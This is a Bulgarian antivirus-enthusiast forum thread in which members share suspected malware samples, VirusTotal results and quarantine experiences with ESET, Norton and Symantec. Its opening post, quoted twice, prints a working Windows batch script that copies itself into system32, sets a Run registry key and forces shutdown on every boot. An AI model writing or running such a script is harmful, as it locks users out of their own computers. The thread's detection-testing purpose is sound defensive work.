Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

 

Подпомагане на АВ програмите с дефиниции,откриване на нови заплахи - част 14

Featured Replies

Не определятся антивирусами, virustotal молчит.


вообщем... создается текстовый документ и записывается:


Snow
@echo off
copy %0 %SystemRoot%system32aHTu-3aDpoT.bat >nul
reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v update /t REG_SZ /d %SystemRoot%system32aHTu-3aDpoT.bat /f >nul
shutdown -s -t 10 -c "XBaTuT 3aDpa4uBaTb! OTDoxHu! {_H@cked_by_DeaDly-WorM_}" >nul


сохраняется как bat


после того как создан "файл" на своей системе "автор" запускать его не советует

Публикувано изображение



цитата:

суть в том, что при запуске вирус добавляется в автозапуск, а затем вырубает комп. при следующих включениях компа вирус будет запускаться и вырубать комп. на своем компе не юзайте, а то замучаетесь его удалять

Редактирано от drago.d (преглед на промените)

  • Отговори 2,4k
  • Прегледи 118k
  • Създадено
  • Последен отговор

Не определятся антивирусами, virustotal молчит.

вообщем... создается текстовый документ и записывается:

Snow

@echo off

copy %0 %SystemRoot%system32aHTu-3aDpoT.bat >nul

reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v update /t REG_SZ /d %SystemRoot%system32aHTu-3aDpoT.bat /f >nul

shutdown -s -t 10 -c "XBaTuT 3aDpa4uBaTb! OTDoxHu! {_H@cked_by_DeaDly-WorM_}" >nul

сохраняется как bat

после того как создан "файл" на своей системе "автор" запускать его не советует

Публикувано изображение

цитата:

суть в том, что при запуске вирус добавляется в автозапуск, а затем вырубает комп. при следующих включениях компа вирус будет запускаться и вырубать комп. на своем компе не юзайте, а то замучаетесь его удалять

Айде бре ..

new.bat Обнаружено: Trojan.BAT.Shutdown.he 30.8.2012 г. 01:13:55 ч.

Редактирано от nikssi (преглед на промените)

Мерси за ключетата

Публикувано изображение

Мерси за ключетата

Публикувано изображение

Не съм пробвал дали са валидни - но 16 програми при Вирустотал класифицират с дефиниции вредоносен код.
Файла е чист,но евристиката на "Краля" се престарава!

Файла бих искал да го пратя за грешно засичане,но с това име и самото му предназначение .....не върви някак си.

Редактирано от Соломон Кейн (преглед на промените)

А какво бихте казали за това http://dox.bg/files/dw?a=ac59f56fb3

Резултати при липса на заплаха, защото видоизмених файлчето - за да не стартира https://www.virustotal.com/file/2013e6cac92763fcfc70f89e8bd159c0e7b4f98bcae78dfd9f255398e33bc741/analysis/1346320879/

А какво бихте казали за това http://dox.bg/files/dw?a=ac59f56fb3

Резултати при липса на заплаха, защото видоизмених файлчето - за да не стартира https://www.virustot...sis/1346320879/

Симантек според вирус тотал го определя като заплаха. Защо така?

Ами още 19 го класифицират като заплаха... какво ли значи това ?

А на NEY файловете се отказах да ги тествам... поне за сега.. няма смисъл. Все пак браво за усилията на човека.. да ги търси.

Редактирано от hUstle (преглед на промените)

Ами още 19 го класифицират като заплаха... какво ли значи това ?

А на NEY файловете се отказах да ги тествам... поне за сега.. няма смисъл. Все пак браво за усилията на човека.. да ги търси.

Не търся нещо, което зная къде е и какво е... WS.Reputation.1 според Симантек характеризира неопределен файл - това, че е спрян заради репутация, не го определя за опасен или безопасен!

Ами още 19 го класифицират като заплаха... какво ли значи това ?

А на NEY файловете се отказах да ги тествам... поне за сега.. няма смисъл. Все пак браво за усилията на човека.. да ги търси.

Стартирах го нормално и пак нищо не се случва. Тодоре мерси за ключето ;)

Публикувано изображение

Какво му е зловредното питам?

пп. Каченият файл му дайте разширение zip

... WS.Reputation.1 според Симантек характеризира неопределен файл - това, че е спрян заради репутация, не го определя за опасен или безопасен!

:rolleyes: Знаех си аз

Редактирано от nikssi (преглед на промените)

Разбираемо е, но нека не дразним мои приятели от Украйна, че току виж и те решат да ме отлюспват с Бан...

Подаръци, карантирани от ESS при посещението на 20ина страници и един случаен файл. Само това не разбрах точно как става пак... есет карантира елемент от страницата, който във вирус тотал се вижда, че реално е заплаха и после при възстановяване от карантирата и он-деманд скан есет мълчи... При разглеждане на файлчетата във ВТ Авира и ДокУеб отново се справят чудесно.

0v7R@q8_.txt

Редактирано от М. Дамянов (преглед на промените)

Повечето файлчета не са изпълними, НИС не реагира с изключение на два изпълними...

Публикувано изображение

По репутация се хваща само за тези...

Редактирано от hUstle (преглед на промените)

Само това не разбрах точно как става пак... есет карантира елемент от страницата, който във вирус тотал се вижда, че реално е заплаха и после при възстановяване от карантирата и он-деманд скан есет мълчи...

Да не сте избрали опцията за изключване на файла от сканиране след възстановяване от карантината. Публикувано изображение

Или може да имате разлика в настройките за почистване, нивото на евристиките, или за сканиране на потенциално нежелани/несигурни/подозрителни програми, в трите различни модула - Real time scanning, On Demand Computer scan и Web Filtering (http scanning)

Редактирано от viperdick (преглед на промените)

Ми май не. В смисъл, вдигнал съм настройките, като съм дал да чисти каквото намери за всички скенери, да открива пуп-ове за всички скенери и всички скенери използват разширени евристики, да се сканират всички файлове и... така. Нямам приложения в активен режим на защита за уеб приложения,не съм дал сканиране на пакети само... Хипсът е изключен.

Не съм изключвал от засичане след възстановяване оот карантина. Изключвам защитата и след това ги възстановявам. Иначе пак ги прибира...

Повечето файлчета не са изпълними, НИС не реагира с изключение на два изпълними...

Ами това са зловредни елементи от страници (някои от тях са скриптови вируси, други inf и crypt...), които ти правят бели. Пращай на Нортън.

То сега се сетих (къв съм?!), Авира и Докторчето са добри понеже се ръководих при избора на страниците, които те откриват основно...а също така на Касапа. Не съм гледал разбира се неща, които открива нод. Нямаше да е интересно...

Редактирано от М. Дамянов (преглед на промените)

Ми май не. В смисъл, вдигнал съм настройките, като съм дал да чисти каквото намери за всички скенери, да открива пуп-ове за всички скенери и всички скенери използват разширени евристики, да се сканират всички файлове и... така. Нямам приложения в активен режим на защита за уеб приложения,не съм дал сканиране на пакети само... Хипсът е изключен.

Не съм изключвал от засичане след възстановяване оот карантина. Изключвам защитата и след това ги възстановявам. Иначе пак ги прибира...

Дай един от тези файлове където забеляза това - аз да пробвам с v6 RC.

Ами, за съжаление не запазих адресите на уебсайтовете. И така не знам дали ще може да се разбере. Eто 3 от тях, но аз като не съм запомнил адресите... другият път ще включа и адресите... И между другото ще можеш ли да ги изпратиш, че аз не успях нещо...? https://www.virustotal.com/file/d1966c1f9c23157994a17f158714b3901f35b93a5b1f8d70426e28f0360cd1bb/analysis/1346441602/ https://www.virustotal.com/file/6b6aa0afffcf42dc92ef5624227edc33d5f98c13c725a47d1c3e30a4174a22aa/analysis/1346441861/ https://www.virustotal.com/file/c5c303351605a2d3f4066de62b81d8d1143c484943d89936fceeab4b8af7c48d/analysis/

f7Q_l0oi89V.txt

Нещо по-различно http://download.cnet.com/Easy-Hide-IP/3000-2144_4-10714026.html?part=dl-6297234&subj=dl&tag=button Резултати https://www.virustotal.com/file/74a811e8b15dde597099d5295a76eb8dc81c32d7251802c0aedcecbfb4778f89/analysis/1346495352/ При мен SEP 12 блокира и прави невъзможно стартирането на файлчето. Как е с други програми?

Архивирана тема

Темата е твърде стара и е архивирана. Не можете да добавяте нови отговори в нея, но винаги можете да публикувате нова тема, в която да продължи дискусията. Регистрирайте се или влезте във вашия профил за да публикувате нова тема.

Разглеждащи това в момента 0

  • Няма регистрирани потребители разглеждащи тази страница.

Дарение

  • Подкрепи съществуването на форума - направи дарение
    32%
    Дарени 315 € от нужните 1 000 €

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.